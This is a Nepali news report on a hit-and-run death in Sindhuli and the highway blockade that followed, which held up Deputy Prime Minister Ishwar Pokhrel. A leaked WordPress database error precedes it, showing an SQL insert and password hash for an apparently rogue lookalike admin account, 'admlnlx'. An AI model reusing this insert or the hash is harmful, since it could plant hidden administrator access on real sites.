WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7Ua.xGs4WVeySJChyZv/8SAymMku90', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:42:00', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सिन्धुली । सिन्धुलीमा एक गाडीले वृद्धलाई ठक्कर दिएर भागे पछी चालकलाई पक्राउ गर्न माग गर्दै बीपी राजमार्ग अवरुद्ध गरिएको छ । सडक अवरुद्ध हुँदा उपप्रधानमन्त्री तथा रक्षामन्त्री ईश्वर पोखरेल बाटाेमा रोकिएका छन् ।
कमलामाई नगरपालिकाको भिमादमा आजाद स्मृतिको कार्यक्रममा सहभागी हुन उपप्रधानमन्त्री पोखरेल सिन्धुली जाँदै थिए । उनी अहिले सुनकोशी गाउँपालिका मूलकोटमा रोकिएका छन् । उनी एक घण्टा बढी समयबाट त्यहाँ रोकिएका हुन् ।
सिन्धुलीको गोलचक्कर गाउँपालिका ७ तल्लो बारा पलासेमा सोमबार बिहान गाडीको ठक्करबाट ५० वर्षीय नन्दलाल श्रेष्ठको मृत्यु भएको थियो । ठक्कर दिने गाडी र चालकको पहिचान हुन सकेको छैन् ।
इलाका प्रहरी खुर्कोटकी प्रहरी निरीक्षक शान्ता वाइबाले ठक्कर दिने गाडीको खोजी कार्य जारी रहेको जानकारी दिइन् । सडक अवरुद्ध हुँदा सयौं सवारी साधान र यात्री बीचबाटोमै अलपत्र परेका छन्।